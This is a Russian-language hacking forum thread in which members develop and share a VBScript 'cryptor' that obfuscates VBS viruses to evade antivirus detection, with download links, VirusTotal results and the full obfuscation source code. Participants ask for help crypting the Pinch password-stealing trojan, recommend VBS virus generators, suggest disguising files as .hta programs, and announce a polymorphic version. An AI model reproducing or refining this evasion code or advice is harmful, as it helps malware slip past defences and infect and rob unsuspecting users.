![]() |
Криптор vbs
Сделал криптор vbs файлов, тока после того как сделал, заметил, что каспер,гад, палит,но на вирустотале его палит тока каспер и еще один какой-то левый антивирь, подумал, может кому понадоботся, ща буду пробовать от каспера скрывать. Криптор написан на vbs.
http://grob-t.narod.ru/Cryptor.vbs |
переделал криптор, теперь на вирустотале все молчит как рыба!
качать тут http://grob-t.narod.ru/cryptornew.vbs |
Можеш его выложить с расширением .ехе ?
|
непонял, ты имеешь ввиду скомплированный?скоро выложу, только немного переделаю, чтоб имена файлов надо было самому вводить
|
PAKOT, выложил в exe http://grob-t.narod.ru/kryptorvbs.rar
пароль grob-t.narod.ru |
не понел =((((( а как криптовать то Pinch ? =(((((
|
это криптор файлов *.vbs, а пинч - это exe, следовательно его этим криптором нельзя закриптовать!
|
Вот что говорит вирустотал(остальное чисто)
BitDefender 7.2 03.27.2007 Trojan.VBS.Kalmar.Dropper.A (ну и название блин) Ewido 4.0 03.27.2007 Worm.Ancrist Panda 9.0.0.4 03.27.2007 Suspicious file |
mm..... а че за вирус в фармате .vbs че он делает этот вирус ? блин кто поможет с хорошим криптором фармата .exe ? мне для Pincha =((((
|
Ссорри за оффтоп, но зачем проверять на вирустотале, он же палиться намного быстрее начнет.
|
Цитата:
или http://damagelab.org/index.php?showtopic=17244 |
v1ru$, спасибо, что сказал, видимо, все зависит от самого вируса, когда я на вирустотале проверил вирус, сгенеренный на апокалипсисе со всеми настройками, результат был намного хуже чем у тебя, палил даже каспер:)
Вот обновление http://grob-t.narod.ru/Cryptor.vbs , тот же вирь на апокалипсисе определяют только BitDefender:VBS.Alien.B@mm и McAfee:NewScript, сегодня под вечер, а может и раньше немного изменю криптор, если кто заметил, то первый и второй криптор были совсем разные, короче попробую их скрестить, и кстати v1ru$ что ты такое криптовал у меня ни панда ни Ewido ни разу не вякнули Slapy, vbs вирусы это обычные вирусы делают тоже-самое,что и обычные вирусы написаны на языке Visual Basic Script, если хочешь разобраться скачай какой-нибудь генератор vbs вирусов, их много, русский - apokalipses |
Цитата:
|
Вот очередное обновление:
Set FSO = CreateObject("Scripting.FileSystemObject") Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать Set TextStream = File.OpenAsTextStream(1) While Not TextStream.AtEndOfStream Str = TextStream.ReadLine() st=st&replace(str,"""","""""") st=st&"""&flrcbv&""" strr=StrReverse(st) Wend TextStream.Close Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )" TextStream.Close Правда от BitDefender не удалось скрыть :( , только от McAfee, а, кстати этот антивирь BitDefender, он популярный или нет? |
Вроде бит не очень,но пинчи палит криптованые(если паблик криптор)
З.Ы.На вирустотале я проверял сам криптор) |
А можеж выложить конечный код (когда уже с формою).Интересно взглянуть.
П.С.Я просто практикуюсь на вб, и хотел бы знать как ты ето зделал. |
Вот блин каспер ворчит на хак тулл!!!
|
Dimi4, это написано на VBS, хотя на vb тоже работать должно, формы помоему не надо
|
Цитата:
|
2 Dimi4, это и есть код
Set FSO = CreateObject("Scripting.FileSystemObject") Set File = FSO.GetFile("C:\temp.vbs")'Тут нужно указать путь к файлу, который надо закриптовать Set TextStream = File.OpenAsTextStream(1) While Not TextStream.AtEndOfStream Str = TextStream.ReadLine() st=st&replace(str,"""","""""") st=st&"""&flrcbv&""" strr=StrReverse(st) Wend TextStream.Close Set TextStream = FSO.CreateTextFile("C:\temp2.vbs")'Сюда будет сохраняться закриптованный файл TextStream.Writeline "a=StrReverse("""&strr&""")"&vbcrlf&"execute(a )" TextStream.Close |
Да не тот, мне нужен когда вручную вводить путь
|
Dimi4, теперь понял, а что именно тебе надо, чтоб вылезал обычный inputbox или диалог выбора файла?
|
диалог выбора файла или паки.Потом штоб инфа кидалась на текст бокс
|
В vbs нету текстбоксов, они есть в ВБ, кстати вроде выбор файла будет работать только на xp и выше не проверял
выбор файла Set objDialog = CreateObject("UserAccounts.CommonDialog") objDialog.Filter = "WSH скрипты (*.vbs, *.js)|*.vbs;*.js|Все файлы (*.*)|*.*" objDialog.FilterIndex = 2 objDialog.InitialDir = "C:\" intResult = objDialog.ShowOpen If intResult = 0 Then MsgBox "Файл не выбран!", vbInformation Else Wscript.Echo objDialog.FileName End If выбор папки On Error Resume Next Set objShellApp = CreateObject("Shell.Application") Set objFolder = objShellApp.BrowseForFolder(0, "Выбор папки", 0, "C:\") MsgBox objFolder.Self.Path, vbInformation If Err.Number <> 0 Then MsgBox "Папка не выбрана!", vbInformation End If еще один способ выбора файла Set objDialog = CreateObject("SAFRCFileDlg.FileOpen") intResult = objDialog.OpenFileOpenDlg WScript.Echo "Результат операции: " & CStr(intResult) WScript.Echo "Выбран файл: " & objDialog.FileName |
Цитата:
|
Shred, не, лучше расширение сделать .hta тогда будет похоже на обычную прогу
|
каспер недавно стал палить криптор, я сделал полиморфный криптор vbs файлов, криптор написан на VB6:
http://grob-t.narod.ru/vbs-cryptor.rar пасс на архив - 666 |
блин какая то ошибка выходит типо прошло много времени!!!
|
sakauri, это из-за пустых строчек в конце твоего файла, обновил ссылку перекачай еще раз
|
| Время: 13:30 |